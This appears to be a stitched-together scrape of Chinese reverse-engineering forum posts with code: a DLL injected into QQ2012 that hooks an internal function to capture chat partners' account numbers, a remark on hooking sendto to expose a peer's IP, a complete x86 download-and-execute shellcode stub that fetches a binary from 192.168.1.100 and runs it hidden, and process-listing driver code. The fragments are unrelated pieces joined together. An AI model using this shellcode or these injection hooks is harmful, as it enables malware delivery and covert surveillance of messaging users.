[求助]不知各位有何思路可以获取QQ2012聊天对象的号码
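// QQSubclass.cpp : Defines the entry point for the DLL application.
//
// Injected into QQ2012. Detours AppUtil!Util::ChatSession::OpenContactChatSession so
// that every time a chat window is opened the DLL learns the peer UIN (QQUIN), tags the
// chat window with it, subclasses the window and offers a right-click menu on the
// window's non-client area. Everything here is bound to one QQ2012 build: the
// decorated export names below are that build's and will not resolve on another.
//
// Review notes on what changed relative to the first version of this file:
//  * The function-pointer typedefs now follow the decorated export names
//    ("YAX...@Z" = void __cdecl, "YAPAUHWND__@@KH@Z" = HWND __cdecl(unsigned long, int),
//    "YAGK@Z" = unsigned short __cdecl(unsigned long)). The detour of a void function
//    was typed as returning int, and GetChatSessionMainHWnd was called with one of its
//    two arguments missing, so the callee read stack garbage.
//  * The chat window was subclassed twice in a row with SetWindowLong, so fnOldWndProc
//    ended up pointing at SubclassWndProc itself and CallWindowProc recursed until the
//    stack overflowed. The previous WNDPROC is now kept per window, in a window
//    property, and restored on WM_NCDESTROY.
//  * IsWindow()/SetProp() were handed the *function pointer* of
//    GetChatSessionMainHWnd instead of the HWND it returns, and the IsWindow test was
//    inverted.
//  * DetachQQFun() detached a pointer Detours had never seen (qqFunOpenContactChatSession
//    instead of RealOpenContactChatSession), and AttachQQFun() returned inside an open
//    transaction on failure.
//  * GetFunProc() appended the DLL name to the current directory without a path
//    separator or a bounds check, and loaded from the CWD -- a DLL search-order hijack.
//    It now loads by full path from the host executable's directory.
//  * The menu handler waited for command id 32783, which ShowMenu() (ids 1000/1001)
//    can never return, and fell off the end of a non-void function.
//  * The unused SetWindowSubclass/comctl32 plumbing (only referenced from a commented-out
//    line) and the MessageBox in DllMain (loader lock) were removed.
#include "stdafx.h"
#include "resource.h"
#include "detours/detours.h"
#include <TCHAR.H>
#include <WINLDAP.H>

struct ITXData;  // opaque QQ type; only ever passed through to the real function

// ?OpenContactChatSession@ChatSession@Util@@YAXKPAUITXData@@@Z
typedef void (__cdecl *QQFunOpenContactChatSession)(unsigned long, struct ITXData *);
// ?GetChatSessionMainHWnd@ChatSession@Util@@YAPAUHWND__@@KH@Z
typedef HWND (__cdecl *QQFunGetContactChatSessionMainHWnd)(unsigned long, int);
// ?GetIMVersion@Contact@Util@@YAGK@Z
typedef unsigned short (__cdecl *QQFunGetIMVersion)(unsigned long);

// Decorated export names, kept in one place because they are build-specific.
static const char kExportOpenContactChatSession[] = "?OpenContactChatSession@ChatSession@Util@@YAXKPAUITXData@@@Z";
static const char kExportGetChatSessionMainHWnd[] = "?GetChatSessionMainHWnd@ChatSession@Util@@YAPAUHWND__@@KH@Z";
static const char kExportGetIMVersion[]           = "?GetIMVersion@Contact@Util@@YAGK@Z";

// Window properties hung on each subclassed chat window.
static const TCHAR kPropUin[]        = _T("QQUIN");        // peer UIN, stored as HANDLE
static const TCHAR kPropOldWndProc[] = _T("QQOldWndProc"); // WNDPROC we replaced
static const TCHAR kPropLeftHwnd[]   = _T("LeftHwnd");     // our side dialog, once created

// Command ids inserted by ShowMenu(); sub_10008E0D() dispatches on the same values.
enum { IDM_FIRST = 1000, IDM_SECOND = 1001 };
// UINs at or below this value are not treated as contacts (reserved/system accounts).
// Threshold inherited from the original code -- TODO confirm.
static const unsigned long kMinContactUin = 10000;

QQFunOpenContactChatSession qqFunOpenContactChatSession;   // original export address (reference only)
QQFunOpenContactChatSession RealOpenContactChatSession;    // Detours trampoline once attached
QQFunGetContactChatSessionMainHWnd qqFunGetContactChatSessionMainHWnd;
QQFunGetIMVersion qqFunGetIMVersion;
LPVOID GetFunProc(LPCTSTR, LPCSTR);
HINSTANCE hModule;  // this DLL, needed for resource lookups

// Dialog procedure for IDD_DIALOG. Nothing is handled yet: returning FALSE hands every
// message to the default dialog handling (same behaviour as the original's "return 0").
INT_PTR CALLBACK sub_10009E1F(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    UNREFERENCED_PARAMETER(hWnd);
    UNREFERENCED_PARAMETER(uMsg);
    UNREFERENCED_PARAMETER(wParam);
    UNREFERENCED_PARAMETER(lParam);
    return FALSE;
}

// Dispatches the command id that TrackPopupMenu(TPM_RETURNCMD) returned for chat window
// hWnd. Returns TRUE when a command was handled, FALSE for 0 (menu dismissed), an
// unknown id, or a failure.
BOOL __cdecl sub_10008E0D(HWND hWnd, int cmd)
{
    switch (cmd) {
    case IDM_FIRST: {
        // Create the side dialog once and remember it on the chat window; a second
        // click just brings the existing one back.
        HWND hExisting = (HWND)GetProp(hWnd, kPropLeftHwnd);
        if (hExisting != NULL && IsWindow(hExisting)) {
            ShowWindow(hExisting, SW_SHOW);
            return TRUE;
        }
        HWND hDlg = CreateDialogParam(hModule, MAKEINTRESOURCE(IDD_DIALOG), hWnd,
                                      sub_10009E1F, 0);
        if (hDlg == NULL) {
            OutputDebugStringA("CreateDialogParam failed");
            return FALSE;
        }
        return SetProp(hWnd, kPropLeftHwnd, (HANDLE)hDlg);
    }
    case IDM_SECOND:
        // No handler yet (the original had none either).
        return FALSE;
    default:
        return FALSE;
    }
}

// Pops the context menu up at the cursor and dispatches the chosen command.
// Returns the result of DestroyMenu, FALSE if the menu could not be built.
BOOL __cdecl ShowMenu(HWND hWnd)
{
    OutputDebugStringA("ShowMenu");
    HMENU hPopupMenu = CreatePopupMenu();
    if (hPopupMenu == NULL)
        return FALSE;
    InsertMenu(hPopupMenu, 0, MF_BYPOSITION | MF_STRING, IDM_FIRST,  _T("First"));
    InsertMenu(hPopupMenu, 1, MF_BYPOSITION | MF_STRING, IDM_SECOND, _T("Second"));

    POINT pt = { 0, 0 };
    GetCursorPos(&pt);
    // TPM_RETURNCMD: the selected id comes back as the return value (0 if dismissed)
    // instead of a WM_COMMAND, so QQ's own WM_COMMAND handling is never involved.
    int sel = TrackPopupMenu(hPopupMenu, TPM_BOTTOMALIGN | TPM_RETURNCMD,
                             pt.x, pt.y, 0, hWnd, NULL);
    if (sel != 0)
        sub_10008E0D(hWnd, sel);
    return DestroyMenu(hPopupMenu);
}

// Replacement WNDPROC for a subclassed chat window. Right-click on the non-client
// area opens our menu; everything else goes to the WNDPROC saved in kPropOldWndProc.
static LRESULT CALLBACK SubclassWndProc(HWND hQQUIN, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    WNDPROC prev = (WNDPROC)GetProp(hQQUIN, kPropOldWndProc);

    switch (uMsg) {
    case WM_NCRBUTTONUP:
        ShowMenu(hQQUIN);
        return TRUE;  // swallowed, as in the original

    case WM_NCDESTROY:
        // Last message a window ever gets: put the original WNDPROC back and drop our
        // properties so nothing dangles after QQ destroys the chat window.
        // 32-bit only (SetWindowLong/GWL_WNDPROC), like the rest of this file.
        if (prev != NULL)
            SetWindowLong(hQQUIN, GWL_WNDPROC, (LONG)prev);
        RemoveProp(hQQUIN, kPropOldWndProc);
        RemoveProp(hQQUIN, kPropUin);
        RemoveProp(hQQUIN, kPropLeftHwnd);
        break;
    }

    if (prev == NULL)
        return DefWindowProc(hQQUIN, uMsg, wParam, lParam);
    return CallWindowProc(prev, hQQUIN, uMsg, wParam, lParam);
}

// Tags hWnd with the peer UIN and installs SubclassWndProc exactly once per window.
// Returns FALSE if hWnd is not a window or the hook could not be recorded.
static BOOL SubclassChatWindow(HWND hWnd, unsigned long QQUIN)
{
    if (!IsWindow(hWnd))
        return FALSE;
    SetProp(hWnd, kPropUin, (HANDLE)(ULONG_PTR)QQUIN);
    if (GetProp(hWnd, kPropOldWndProc) != NULL)
        return TRUE;  // already subclassed (chat window re-opened for the same peer)

    // Record the previous WNDPROC *before* swapping it in, so SubclassWndProc never
    // runs without a chain target.
    WNDPROC prev = (WNDPROC)GetWindowLong(hWnd, GWL_WNDPROC);
    if (prev == NULL || !SetProp(hWnd, kPropOldWndProc, (HANDLE)prev))
        return FALSE;
    SetWindowLong(hWnd, GWL_WNDPROC, (LONG)SubclassWndProc);
    return TRUE;
}

// Detour for Util::ChatSession::OpenContactChatSession(QQUIN, data). The signature
// must match the target exactly (void __cdecl) or the trampoline corrupts the stack.
void __cdecl MyOpenContactChatSession(unsigned long QQUIN, struct ITXData *xxx)
{
    OutputDebugStringA("MyOpenContactChatSession");

    // Let QQ create/raise the chat window first and only then look it up. The
    // original looked the window up before calling the real function, at which point
    // it may not exist yet.
    RealOpenContactChatSession(QQUIN, xxx);

    if (QQUIN <= kMinContactUin)
        return;
    if (qqFunGetContactChatSessionMainHWnd == NULL) {
        OutputDebugStringA("qqFunGetContactChatSessionMainHWnd == NULL");
        return;
    }
    // Second argument is an int per the decorated name; its meaning is unknown and
    // the original passed nothing at all. 0 -- TODO confirm against the real caller.
    HWND hChat = qqFunGetContactChatSessionMainHWnd(QQUIN, 0);
    if (!SubclassChatWindow(hChat, QQUIN)) {
        OutputDebugStringA("chat window not found or subclass failed");
        return;
    }

    if (qqFunGetIMVersion != NULL) {
        unsigned short IMVersion = qqFunGetIMVersion(QQUIN);
        // Re-pack "major*100 + minor" as 0xMMmm for the debug line (same as before).
        unsigned short QQVersion =
            (unsigned short)((IMVersion % 100) | ((unsigned __int8)(IMVersion / 100) << 8));
        char tzTemp[64];
        wsprintfA(tzTemp, "%lu:%04X", QQUIN, QQVersion);
        OutputDebugStringA(tzTemp);
    }
}

// Installs the detour on OpenContactChatSession. Returns TRUE when the transaction
// committed; on any failure the transaction is aborted and nothing is left half-hooked.
BOOL AttachQQFun(VOID)
{
    OutputDebugStringA("AttachQQFun");
    DetourRestoreAfterWith();

    // Resolve through Detours so the very same pointer is used for attach and detach.
    RealOpenContactChatSession = (QQFunOpenContactChatSession)
        DetourFindFunction("AppUtil.dll", kExportOpenContactChatSession);
    if (RealOpenContactChatSession == NULL) {
        OutputDebugStringA("DetourFindFunction(OpenContactChatSession) failed");
        return FALSE;
    }

    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    OutputDebugStringA("DetourAttach");
    if (DetourAttach(&(PVOID&)RealOpenContactChatSession, MyOpenContactChatSession) != NO_ERROR) {
        DetourTransactionAbort();
        return FALSE;
    }
    return DetourTransactionCommit() == NO_ERROR;
}

// Removes the detour installed by AttachQQFun(). Safe to call when nothing was attached.
BOOL DetachQQFun(VOID)
{
    OutputDebugStringA("DetachQQFun");
    if (RealOpenContactChatSession == NULL)
        return TRUE;

    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    // Must be the pointer DetourAttach() was given; the original passed
    // qqFunOpenContactChatSession here, which Detours had never seen.
    if (DetourDetach(&(PVOID&)RealOpenContactChatSession, MyOpenContactChatSession) != NO_ERROR) {
        DetourTransactionAbort();
        return FALSE;
    }
    return DetourTransactionCommit() == NO_ERROR;
}

// Resolves qqFunName from qqDllName. Prefers a module the process has already loaded;
// otherwise loads it by full path from the directory of the host executable -- never
// from the current directory, where anyone can plant a same-named DLL.
// Assumes QQ's helper DLLs live beside the host EXE -- TODO confirm.
LPVOID GetFunProc(LPCTSTR qqDllName, LPCSTR qqFunName)
{
    HMODULE hMod = GetModuleHandle(qqDllName);
    if (hMod == NULL) {
        TCHAR qqPath[MAX_PATH];
        DWORD n = GetModuleFileName(NULL, qqPath, MAX_PATH);
        if (n == 0 || n >= MAX_PATH)
            return NULL;  // failed or truncated
        TCHAR *slash = _tcsrchr(qqPath, _T('\\'));
        if (slash == NULL)
            return NULL;
        slash[1] = _T('\0');  // keep the trailing backslash as the separator
        if (_tcslen(qqPath) + _tcslen(qqDllName) + 1 > MAX_PATH)
            return NULL;  // directory + name + NUL would not fit
        _tcscat(qqPath, qqDllName);
        hMod = LoadLibrary(qqPath);
        if (hMod == NULL)
            return NULL;
    }
    return (LPVOID)GetProcAddress(hMod, qqFunName);
}

// Resolves every QQ export this DLL needs. Returns FALSE if any is missing, which
// most likely means a QQ build other than the one these names were taken from.
BOOL InitQQHook()
{
    qqFunOpenContactChatSession = (QQFunOpenContactChatSession)
        GetFunProc(_T("AppUtil.dll"), kExportOpenContactChatSession);
    if (qqFunOpenContactChatSession == NULL)
        return FALSE;
    qqFunGetContactChatSessionMainHWnd = (QQFunGetContactChatSessionMainHWnd)
        GetFunProc(_T("AppUtil.dll"), kExportGetChatSessionMainHWnd);
    if (qqFunGetContactChatSessionMainHWnd == NULL)
        return FALSE;
    qqFunGetIMVersion = (QQFunGetIMVersion)
        GetFunProc(_T("KernelUtil.dll"), kExportGetIMVersion);
    if (qqFunGetIMVersion == NULL)
        return FALSE;
    return TRUE;
}

// Hooks on load, unhooks on unload. Returning FALSE from DLL_PROCESS_ATTACH makes the
// loader unload us again. No UI here: DllMain runs under the loader lock.
BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        hModule = hinstDLL;
        DisableThreadLibraryCalls(hinstDLL);
        OutputDebugStringA("InitQQHook");
        if (!InitQQHook()) {
            OutputDebugStringA("InitQQHook error");
            return FALSE;
        }
        if (!AttachQQFun()) {
            OutputDebugStringA("AttachQQFun error");
            return FALSE;
        }
        break;

    case DLL_PROCESS_DETACH:
        // lpReserved != NULL means the process is terminating: other threads are gone
        // and QQ's modules may already be unmapped, so leave them alone.
        if (lpReserved == NULL)
            DetachQQFun();
        break;
    }
    return TRUE;
}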
[下载]hook sendto函数取得QQ对方IP地址的代码
逆向了两个出名的显 IP 版 QQ，两者都是通过 HOOK sendto 函数实现的。
[原创]关于防网马(拦URLDownloadToFile)
/*
 * Position-independent download-and-execute stub (MSVC inline asm, x86-32).
 *
 * This is the payload shape the post wants to intercept ("web trojan": fetch a binary
 * with URLDownloadToFileA, run it with WinExec). It carries no imports: it locates
 * kernel32.dll through the PEB, finds GetProcAddress by scanning kernel32's export
 * name table, and bootstraps LoadLibraryA, WinExec and urlmon!URLDownloadToFileA
 * from there. String arguments are placed inline after a `call` and recovered with
 * `pop edi` (call/pop trick).
 *
 * Finding kernel32 via the PEB:
 *   1. fs: points at the TEB.
 *   2. TEB+0x30 points at the PEB.
 *   3. PEB+0x0c points at PEB_LDR_DATA.
 *   4. PEB_LDR_DATA+0x1c is the InInitializationOrderModuleList; its first entry is
 *      ntdll.dll and the second is taken to be kernel32.dll.
 *
 * Review notes (code left as posted):
 *  - Step 4 hard-codes "second module in initialization order == kernel32". That is
 *    version dependent; newer Windows is commonly reported to put kernelbase.dll
 *    there (Windows 7 and later) -- verify on the target before relying on it.
 *  - The export scan does `dec ecx` until "GetProcA" matches. If no name matches,
 *    ecx wraps and the loop reads past the name table. Only 8 bytes are compared,
 *    so "GetProcAddress" is not matched exactly.
 *  - No return value is checked: a NULL from GetProcAddress/LoadLibraryA turns the
 *    later `call [ebp+8]` / `call [ebp+4]` into a jump to address 0.
 *  - The stack is not balanced. The dwords pushed to build each name string stay on
 *    the stack (the __stdcall callees pop only their own arguments), and ebp is
 *    pushed twice but popped once, so `add esp, 0x160` / `pop ebp` do not restore
 *    the frame of the enclosing C function. Acceptable for a raw code buffer that is
 *    copied out and never returns; not for running in place.
 *  - URL and file names are lab values (192.168.1.100, c:\2222.exe). WinExec is
 *    called with uCmdShow = 0 (SW_HIDE).
 *
 * Slot map in the scratch frame: [ebp+40h] GetProcAddress, [ebp+44h] LoadLibraryA,
 * [ebp+4] WinExec, [ebp+8] URLDownloadToFileA.
 */
extra_data_start:
__asm {
    push ebp;
    sub esp, 0x160;                 ; scratch frame for the resolved addresses (see slot map)
    mov ebp,esp;
    push ebp;
    mov eax, fs:0x30                ; fs:0x30 -> PEB
    mov eax, [eax + 0x0c]           ; PEB->Ldr (PEB_LDR_DATA)
    mov esi, [eax + 0x1c]           ; Ldr->InInitializationOrderModuleList.Flink (first entry: ntdll.dll)
    lodsd                           ; eax = Flink of that entry -> second module in init order
    mov edi, [eax + 0x08]           ; +8 in the list entry = DllBase; assumed to be kernel32.dll (see notes)
    mov eax, [edi+3Ch]              ; e_lfanew -> IMAGE_NT_HEADERS (RVA)
    mov edx, [edi+eax+78h]          ; DataDirectory[EXPORT].VirtualAddress
    add edx,edi                     ; edx -> IMAGE_EXPORT_DIRECTORY
    mov ecx, [edx+18h]              ; NumberOfNames
    mov ebx, [edx+20h]              ; AddressOfNames (RVA)
    add ebx,edi
search:
    dec ecx                         ; walk the name table from the last entry downwards
    mov esi, [ebx+ecx*4]
    add esi,edi                     ; esi -> export name; we want GetProcAddress
    mov eax,0x50746547
    cmp [esi], eax                  ; "GetP" (little-endian)
    jne search
    mov eax,0x41636f72
    cmp [esi+4],eax                 ; "rocA" -- only these 8 bytes are compared
    jne search
    mov ebx,[edx+24h]               ; AddressOfNameOrdinals (RVA)
    add ebx,edi
    mov cx,[ebx+ecx*2]              ; ordinal = index into AddressOfFunctions
    mov ebx,[edx+1Ch]               ; AddressOfFunctions (RVA)
    add ebx,edi
    mov eax,[ebx+ecx*4]             ; RVA of GetProcAddress
    add eax,edi
    mov [ebp+40h], eax              ; [ebp+40h] = GetProcAddress
    ; Resolve LoadLibraryA: build "LoadLibraryA\0" on the stack first
    push 0x0
    push dword ptr 0x41797261       ; "aryA"
    push dword ptr 0x7262694c       ; "Libr"
    push dword ptr 0x64616f4c       ; "Load"
    push esp
    push edi
    call [ebp+40h]                  ; GetProcAddress(kernel32 base, "LoadLibraryA")
    mov [ebp+44h], eax              ; [ebp+44h] = LoadLibraryA
    push dword ptr 0x00636578       ; build "WinExec\0": "xec\0"
    push dword ptr 0x456E6957       ; "WinE"
    push esp
    push edi
    call [ebp+40h]                  ; GetProcAddress(kernel32 base, "WinExec")
    mov [ebp+4], eax                ; [ebp+4] = WinExec
    ;
    push dword ptr 0x00006e6f       ; "on\0\0"
    push dword ptr 0x6d6c7275       ; "urlm"
    push esp
    call [ebp+44h]                  ; LoadLibraryA("urlmon")
    mov edi, eax                    ; edi = urlmon base (kernel32 base no longer needed)
    push dword ptr 0x00004165       ; "eA\0\0"
    push dword ptr 0x6c69466f       ; "oFil"
    push dword ptr 0x5464616f       ; "oadT"
    push dword ptr 0x6c6e776f       ; "ownl"
    push dword ptr 0x444c5255       ; "URLD"
    push esp
    push edi
    call [ebp+40h]                  ; GetProcAddress(urlmon base, "URLDownloadToFileA")
    mov [ebp+8], eax                ; [ebp+8] = URLDownloadToFileA
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB): args pushed right to left
    push 0                          ; lpfnCB
    push 0                          ; dwReserved
    call Func1                      ; pushes the address of the file name below
    _emit 'c'
    _emit ':'
    _emit '\\'
    _emit '2'
    _emit '2'
    _emit '2'
    _emit '2'
    _emit '.'
    _emit 'e'
    _emit 'x'
    _emit 'e'
    _emit '\0'
Func1:
    pop edi;
    push edi;                       ; szFileName
    call Func2                      ; pushes the address of the URL below
    _emit 'h'
    _emit 't'
    _emit 't'
    _emit 'p'
    _emit ':'
    _emit '/'
    _emit '/'
    _emit '1'
    _emit '9'
    _emit '2'
    _emit '.'
    _emit '1'
    _emit '6'
    _emit '8'
    _emit '.'
    _emit '1'
    _emit '.'
    _emit '1'
    _emit '0'
    _emit '0'
    _emit '/'
    _emit '2'
    _emit '.'
    _emit 'e'
    _emit 'x'
    _emit 'e'
    _emit '\0';
Func2:
    pop edi;
    push edi;                       ; szURL
    push 0                          ; pCaller
    call [ebp+8]                    ; URLDownloadToFileA(NULL, "http://192.168.1.100/2.exe", "c:\2222.exe", 0, NULL)
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    push 0                          ; uCmdShow = SW_HIDE
    call EXEC;                      ; pushes the address of the command line below
    _emit 'c';
    _emit ':';
    _emit '\\';
    _emit '2';
    _emit '2';
    _emit '2';
    _emit '2';
    _emit '.';
    _emit 'e';
    _emit 'x';
    _emit 'e';
    _emit '\0';                     // file name handed to WinExec
EXEC:
    pop edi;
    push edi;                       ; lpCmdLine
    call [ebp+4]                    ; WinExec("c:\2222.exe", SW_HIDE)
    add esp, 0x160;                 ; see notes: does not account for the string dwords left on the stack
    pop ebp;
}
extra_data_end:
[求助]拜师学win ASM 写一个loader!!
看Iczelion的Win32汇编教程 Win32教程30-Win32调试API 第三部分 Win32教程29-Win32调试API 第二部分 Win32教程28-Win32调试API 第一部分 |
[原创]好听音乐网 -- 歌曲下载分析流程及程序的编写
分析得很好收获很多呵呵 |
[下载]《[专题四]Rootkit的学习与研究》文章整理下载
因为原来的专题还没出来 |
[下载]《[专题四]Rootkit的学习与研究》文章整理下载
没办法我在这里上传文件失败 |
[求助]驱动里怎么获取进程的PID?
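#include "ntddk.h"

/*
 * Lists every process (image name + PID) from kernel mode by calling
 * ZwQuerySystemInformation(SystemProcessInformation = 5) and walking the returned
 * SYSTEM_PROCESS_INFORMATION chain. Output goes to DbgPrint.
 *
 * Changes relative to the first version of this listing:
 *  - ZwQuerySystemInformation is declared NTAPI. It is a __stdcall export; the
 *    original prototype had no calling convention, so an x86 build called it
 *    __cdecl and left the arguments on the stack.
 *  - The return status is checked and the buffer is re-sized while the call reports
 *    STATUS_INFO_LENGTH_MISMATCH. The original walked a fixed 0x8000-byte buffer no
 *    matter what the call returned, i.e. over uninitialised pool whenever the
 *    process list did not fit.
 *  - Every entry is bounds-checked against the filled length before it is read.
 *  - Names are printed with %wZ from the Length-bounded UNICODE_STRING instead of
 *    wcstombs(), a user-mode CRT routine that also assumes NUL termination
 *    (<stdlib.h> is therefore no longer needed in this driver).
 *  - Failure paths return NTSTATUS codes rather than 1, and the pool is tagged.
 *
 * The SYSTEM_*_INFORMATION layouts below are the 32-bit ones the original used; they
 * are not in ntddk.h and must match the target OS -- TODO confirm for the build target.
 */

#define SystemProcessesAndThreadsInformation 5   /* == SystemProcessInformation */

/*---------- function declaration -------------*/
NTKERNELAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );
/*----------------------------------------------*/

/*---------- thread information ---------------*/
typedef struct _SYSTEM_THREAD_INFORMATION {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    LONG State;
    LONG WaitReason;
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
/*----------------------------------------------*/

/*---------- process information --------------*/
typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryDelta;          /* byte offset to the next entry, 0 on the last one */
    ULONG ThreadCount;
    ULONG Reserved1[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;    /* Buffer is NULL for the System Idle Process */
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters;
    SYSTEM_THREAD_INFORMATION Threads[1];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
/*----------------------------------------------*/

#define PROC_LIST_TAG  'LPqq'                 /* pool tag, shows up in !poolused */
#define PROC_LIST_MAX  (16 * 1024 * 1024)     /* give up beyond this buffer size */

/*
 * QueryProcessList - fetch the process list into a freshly allocated paged-pool
 * buffer. Must run at PASSIVE_LEVEL (DriverEntry does).
 *
 * On success *Buffer/*Length describe the filled buffer, which the caller frees with
 * ExFreePoolWithTag(*Buffer, PROC_LIST_TAG). The buffer is grown while the call
 * returns STATUS_INFO_LENGTH_MISMATCH, with some headroom because the process set
 * can change between two calls.
 */
static NTSTATUS QueryProcessList(PVOID *Buffer, ULONG *Length)
{
    ULONG cb = 0x8000;

    for (;;) {
        ULONG needed = 0;
        NTSTATUS status;
        PVOID p = ExAllocatePoolWithTag(PagedPool, cb, PROC_LIST_TAG);
        if (p == NULL)
            return STATUS_INSUFFICIENT_RESOURCES;

        status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation,
                                          p, cb, &needed);
        if (NT_SUCCESS(status)) {
            *Buffer = p;
            /* some versions leave ReturnLength untouched; then the whole buffer counts */
            *Length = (needed != 0 && needed <= cb) ? needed : cb;
            return STATUS_SUCCESS;
        }

        ExFreePoolWithTag(p, PROC_LIST_TAG);
        if (status != STATUS_INFO_LENGTH_MISMATCH)
            return status;

        /* grow: use the reported size plus headroom, or double if it was not reported */
        cb = (needed > cb) ? needed + 0x1000 : cb * 2;
        if (cb > PROC_LIST_MAX)
            return STATUS_INFO_LENGTH_MISMATCH;
    }
}

/*---------------- DriverUnload -------------------------------*/
VOID Unload(PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    DbgPrint("\nUnload Driver!\n");
}
/*-------------------------------------------------------------*/

/*==================== DriverEntry ============================*/
/*
 * Prints "<name>\tPid=<pid>" for every process, then stays loaded until Unload.
 * Returns the failure status of the query (driver not loaded) or STATUS_SUCCESS.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING str)
{
    NTSTATUS ntStatus;
    PVOID pBuffer = NULL;
    ULONG cbFilled = 0;
    PUCHAR pEnd;
    PSYSTEM_PROCESS_INFORMATION pInfo;

    UNREFERENCED_PARAMETER(str);
    DbgPrint("\nDriverEntry!\n");
    DriverObject->DriverUnload = Unload;

    ntStatus = QueryProcessList(&pBuffer, &cbFilled);
    if (!NT_SUCCESS(ntStatus)) {
        DbgPrint("ZwQuerySystemInformation failed: 0x%08X\n", ntStatus);
        return ntStatus;
    }

    pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer;
    pEnd  = (PUCHAR)pBuffer + cbFilled;
    for (;;) {
        /* the fixed part up to Threads[] must lie inside the filled region */
        if ((PUCHAR)pInfo + FIELD_OFFSET(SYSTEM_PROCESS_INFORMATION, Threads) > pEnd) {
            DbgPrint("process list truncated\n");
            break;
        }

        if (pInfo->ProcessName.Buffer == NULL)
            DbgPrint("NULL\tPid=%lu\n", pInfo->ProcessId);
        else
            DbgPrint("%wZ\tPid=%lu\n", &pInfo->ProcessName, pInfo->ProcessId);

        if (pInfo->NextEntryDelta == 0)
            break;
        pInfo = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryDelta);
    }

    ExFreePoolWithTag(pBuffer, PROC_LIST_TAG);
    return STATUS_SUCCESS;
}
/*=============================================================*/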
[求助]驱动里怎么获取进程的PID?
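#include <windows.h>
#include <ntsecapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>

/*
 * User-mode counterpart of the driver above: print PID + image name for every
 * process through ntdll!ZwQuerySystemInformation(SystemProcessInformation = 5).
 * Original poster's note: compiled with VC++ 6.0; the same idea applies in a driver.
 *
 * Changes relative to the first version of this listing:
 *  - GetModuleHandle/GetProcAddress results are checked before the call.
 *  - The NTSTATUS is checked and the buffer grows on STATUS_INFO_LENGTH_MISMATCH
 *    instead of walking 0x10000 bytes of whatever malloc() returned.
 *  - Every entry is bounds-checked against the filled length before it is read.
 *  - Names are printed Length-bounded (%.*ls), and a NULL name (System Idle Process)
 *    is no longer handed to printf("%ls").
 *
 * The struct below is the 32-bit layout of the original listing, truncated after the
 * fields this program reads. Nothing past ProcessId is dereferenced and entries are
 * stepped with NextEntryDelta, so the short tail is harmless.
 */

#define SystemProcessesAndThreadsInformation 5

#ifndef STATUS_INFO_LENGTH_MISMATCH
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#endif
#ifndef NT_SUCCESS
#define NT_SUCCESS(s) (((NTSTATUS)(s)) >= 0)
#endif

/* resolved at run time: not in the import libraries */
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

typedef struct _SYSTEM_PROCESS_INFORMATION {
    DWORD NextEntryDelta;          /* byte offset to the next entry, 0 on the last one */
    DWORD ThreadCount;
    DWORD Reserved1[6];
    FILETIME ftCreateTime;
    FILETIME ftUserTime;
    FILETIME ftKernelTime;
    UNICODE_STRING ProcessName;    /* Buffer is NULL for the System Idle Process */
    DWORD BasePriority;
    DWORD ProcessId;
    DWORD InheritedFromProcessId;
    DWORD HandleCount;
    DWORD Reserved2[2];
    DWORD VmCounters;              /* truncated tail, see header comment */
    DWORD dCommitCharge;
    PVOID ThreadInfos[1];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

#define PROC_LIST_MAX (64u * 1024u * 1024u)   /* give up beyond this buffer size */

/*
 * QueryProcessList - fetch the process list into a malloc()ed buffer.
 * Returns the buffer (caller frees) and sets *filled to the number of valid bytes,
 * or returns NULL after printing the failing status. Grows the buffer while the call
 * reports STATUS_INFO_LENGTH_MISMATCH, with headroom for processes that appear
 * between two calls.
 */
static PSYSTEM_PROCESS_INFORMATION QueryProcessList(ZWQUERYSYSTEMINFORMATION query,
                                                    ULONG *filled)
{
    ULONG cb = 0x10000;

    for (;;) {
        ULONG needed = 0;
        NTSTATUS status;
        void *buf = malloc(cb);
        if (buf == NULL)
            return NULL;

        status = query(SystemProcessesAndThreadsInformation, buf, cb, &needed);
        if (NT_SUCCESS(status)) {
            /* some versions leave ReturnLength untouched; then the whole buffer counts */
            *filled = (needed != 0 && needed <= cb) ? needed : cb;
            return (PSYSTEM_PROCESS_INFORMATION)buf;
        }

        free(buf);
        if (status != STATUS_INFO_LENGTH_MISMATCH) {
            fprintf(stderr, "ZwQuerySystemInformation failed: 0x%08lX\n", (unsigned long)status);
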